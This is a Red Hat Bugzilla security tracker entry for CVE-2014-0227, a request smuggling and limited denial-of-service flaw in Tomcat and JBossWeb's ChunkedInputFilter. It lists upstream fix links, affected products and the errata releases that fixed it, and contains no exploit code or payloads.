Bug 1109196 (CVE-2014-0227)

Summary: CVE-2014-0227 Tomcat/JBossWeb: request smuggling and limited DoS in ChunkedInputFilter
Product: [Other] Security Response Reporter: Arun Babu Neelicattu <aneelica>
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA QA Contact:
Severity: medium Docs Contact:
Priority: medium    
Version: unspecifiedCC: bdawidow, cdewolf, chazlett, darran.lofthouse, grocha, jawilson, jclere, jcoleman, jdoyle, jpallich, kconner, kejohnso, lgao, mbabacek, mjc, mweiler, myarboro, pgier, pslavice, rsvoboda, security-response-team, slaskawi, spinder, theute, tkirby, ttarrant, vtunka, weli
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: JBossWeb 7.4.6.Final, Tomcat 7.0.55, Tomcat 6.0.43 Doc Type: Bug Fix
Doc Text:
It was discovered that the ChunkedInputFilter in Tomcat did not fail subsequent attempts to read input after malformed chunked encoding was detected. A remote attacker could possibly use this flaw to make Tomcat process part of the request body as new request, or cause a denial of service.
 Story Points: ---
Clone Of: Environment:
Last Closed: 2019-06-08 02:33:32 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Bug Depends On: 1109208, 1109199, 1109200, 1109201, 1109202, 1109203, 1109204, 1109205, 1109206, 1109207, 1109209, 1109210, 1109211, 1109212, 1109213, 1109216, 1109217, 1109218, 1109219, 1109220, 1109221, 1109223, 1109225, 1109226, 1109227, 1109228, 1109229, 1160690, 1190821    
Bug Blocks: 1082938, 1119820, 1119823, 1127901, 1181883, 1182400, 1182419, 1200191    

Description Arun Babu Neelicattu 2014-06-13 12:55:29 UTC 
It was discovered that the ChunkedInputFilter implementation did not fail subsequent attempts to read input early enough. A remote attacker could use this flaw to perform a denial of service attack, by streaming an unlimited quantity of data, leading to consumption of server resources.
Comment 1 Arun Babu Neelicattu 2014-06-13 12:59:54 UTC 
Upstream Fix:

Tomcat: http://svn.apache.org/viewvc?view=revision&revision=1600984
JBossWeb: https://source.jboss.org/changelog/JBossWeb?cs=2455
Comment 18 Martin Prpič 2015-02-09 16:38:05 UTC 
Upstream fix for Tomcat 6:

https://svn.apache.org/viewvc?view=revision&revision=1603628

Upstream fix for Tomcat 7:

https://svn.apache.org/viewvc?view=revision&revision=1601333

External References:

https://tomcat.apache.org/security-6.html#Fixed_in_Apache_Tomcat_6.0.43
https://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.55
Comment 19 Martin Prpič 2015-02-09 16:42:45 UTC 
Created tomcat tracking bugs for this issue:

Affects: fedora-all [bug 1190821]
Comment 21 errata-xmlrpc 2015-02-17 22:29:11 UTC 
This issue has been addressed in the following products:

  Red Hat JBoss BRMS 6.0.3

Via RHSA-2015:0235 https://rhn.redhat.com/errata/RHSA-2015-0235.html
Comment 22 errata-xmlrpc 2015-02-17 22:33:36 UTC 
This issue has been addressed in the following products:

  Red Hat JBoss BPM Suite 6.0.3

Via RHSA-2015:0234 https://rhn.redhat.com/errata/RHSA-2015-0234.html
Comment 24 Fedora Update System 2015-02-23 08:02:45 UTC 
tomcat-7.0.59-1.fc21 has been pushed to the Fedora 21 stable repository.  If problems still persist, please make note of it in this bug report.
Comment 25 Tomas Hoger 2015-03-11 10:41:01 UTC 
Tomcat upstream advisories (see comment 18 above) point out additional impact - request smuggling.  Tomcat may read next request from the malformed chunked request body, rather than aborting connection as soon as the first encoding issue is detected.

Upstream does not indicate where this may have practical impact, as Tomcat accepts multiple requests pipelined in a single connection.  It seems this may have impact in deployments where Tomcat is accessed via a reverse proxy that only exposes certain paths / web applications.  This may possibly allow bypass of proxy restrictions and allow access to URLs not exposed by the proxy.  However, this attack would require proxy to allow malformed requests to be passed to Tomcat.
Comment 26 errata-xmlrpc 2015-03-11 16:53:40 UTC 
This issue has been addressed in the following products:

JBoss Data Virtualization 6.1.0

Via RHSA-2015:0675 https://rhn.redhat.com/errata/RHSA-2015-0675.html
Comment 27 errata-xmlrpc 2015-03-24 21:07:00 UTC 
This issue has been addressed in the following products:

  Red Hat JBoss Fuse Service Works 6.0.0

Via RHSA-2015:0720 https://rhn.redhat.com/errata/RHSA-2015-0720.html
Comment 28 errata-xmlrpc 2015-03-31 17:01:54 UTC 
This issue has been addressed in the following products:

  Red Hat JBoss Data Virtualization 6.0.0

Via RHSA-2015:0765 https://rhn.redhat.com/errata/RHSA-2015-0765.html
Comment 31 errata-xmlrpc 2015-05-12 16:37:57 UTC 
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 7

Via RHSA-2015:0983 https://rhn.redhat.com/errata/RHSA-2015-0983.html
Comment 33 errata-xmlrpc 2015-05-12 18:20:33 UTC 
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 6

Via RHSA-2015:0991 https://rhn.redhat.com/errata/RHSA-2015-0991.html
Comment 34 errata-xmlrpc 2015-05-14 15:21:18 UTC 
This issue has been addressed in the following products:

  JBoss Portal 6.2.0

Via RHSA-2015:1009 https://rhn.redhat.com/errata/RHSA-2015-1009.html